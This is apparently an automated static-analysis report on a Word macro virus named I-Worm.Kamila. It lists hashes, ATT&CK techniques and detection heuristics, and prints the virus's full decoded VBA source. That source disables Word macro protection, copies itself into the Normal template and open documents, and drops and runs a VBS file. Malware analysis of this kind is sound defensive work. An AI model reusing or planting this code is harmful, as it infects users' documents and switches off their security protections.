I-Worm.Kamila — Office (OLE) malware analysis

Static analysis result for SHA-256 7362a920526f7b9f…

MALICIOUS

Office (OLE)

Size: 39.5 KB
Created: 2003-01-03 13:56:00
Authoring application: Microsoft Word 10.0
First seen: 2015-10-01
MD5: af4a09e18327b38b342f3c99eb727f40
SHA-1: 85818919c573bd8245df46433229b4754e4a5e0b
SHA-256: 7362a920526f7b9feccb840fb7e9a4c1d9609812ca5cf8741ffb3671dccbde4b
Risk Score: 388

Malware Insights

I-Worm.Kamila · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1553.005 Security Software Installation

The sample is a malicious Word document containing VBA macros. Its Document_Open macro (also invoked from Document_Close) attempts to disable Word's macro security by writing the value 1 to the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level and by setting Options.VirusProtection = False. It then replicates its VBA code between the Normal template and the active document through the VBE object model (Export followed by CodeModule.AddFromFile via a temporary file C:\kama.dll), writes the lines between its '<BODY>' and '</BODY>' marker comments to C:\kam_drop.vbs, and runs that script with WScript.Shell; in this sample the embedded script body is only a MsgBox call. The macro self-identifies as 'I-Worm.Kamila' in its first comment line and in the document summary properties it sets.

Heuristics (8)

  • ClamAV: Win.Trojan.Psycho-3 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 5 related findings)
    Document contains VBA macro code
  • WScript.Shell usage (severity: critical; rule: OLE_VBA_WSCRIPT)
    Matched line in script
        Set wsh = CreateObject("WScript.Shell")
  • VBA macro-virus self-replication / AV tampering (severity: critical; rule: OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    Matched line in script
        Set wsh = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN)
    Matched line in script
    Private Sub Document_Open()
  • Reference to Windows Script Host (severity: high; rule: SC_STR_WSCRIPT)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3029 bytes
SHA-256: 53ad4974cc9cadf54aac2c2075150c0607319507a54b9be6628d72ac2be4629e
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'I-Worm.Kamila

Private Sub Document_Open()
    On Error Resume Next
    If ThisDocument.Type = wdTypeDocument And KamExTemp Then Exit Sub
    If ThisDocument.Type = wdTypeTemplate And KamExDoc Then Exit Sub
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "I-Worm.Kamila"
        .Subject = "I-Worm.Kamila"
        .Comments = "Generated by I-Worm.Kamila"
        .Execute
    End With
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

   With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    ActiveDocument.ReadOnlyRecommended = False
    If KamExDoc And KamExTemp Then Exit Sub

    If KamExDoc Then
        ActiveDocument.VBProject.VBComponents("ThisDocument").Export "C:\kama.dll"
        NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\kama.dll"
        NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 4
    ElseIf KamExTemp Then
        NormalTemplate.VBProject.VBComponents("ThisDocument").Export "C:\kama.dll"
        ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\kama.dll"
        ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 4
    End If
    Kill "C:\kama.dll"
    ActiveDocument.Save
    NormalTemplate.Save
    DropWorm
End Sub

Private Sub Document_Close()
    Document_Open
End Sub

Private Function KamExDoc() As Boolean
    On Error Resume Next
    str1 = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 1)
    KamExDoc = (str1 = "'I-Worm.Kamila")
End Function

Private Function KamExTemp() As Boolean
    On Error Resume Next
    str1 = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 1)
    KamExTemp = (str1 = "'I-Worm.Kamila")
End Function

Private Sub DropWorm()
    On Error Resume Next
    Dim blYes As Boolean
    Dim wsh As Object
    blYes = False
    Open "C:\kam_drop.vbs" For Output As #1
    For i = 1 To ThisDocument.VBProject.VBComponents("ThisDocument").CodeModule.CountOfLines
        str1 = ThisDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(i, 1)
        If str1 = "'<BODY>" Then
            blYes = True
            str1 = ""
        ElseIf str1 = "'</BODY>" Then
            blYes = False
        End If
        If blYes Then
            Print #1, Right(str1, Len(str1) - 1) & vbCrLf
        End If
    Next i
    Set wsh = CreateObject("WScript.Shell")
    Close #1
    wsh.Run "C:\kam_drop.vbs"
    Set wsh = Nothing
End Sub

'<BODY>
'MsgBox "I"
'</BODY>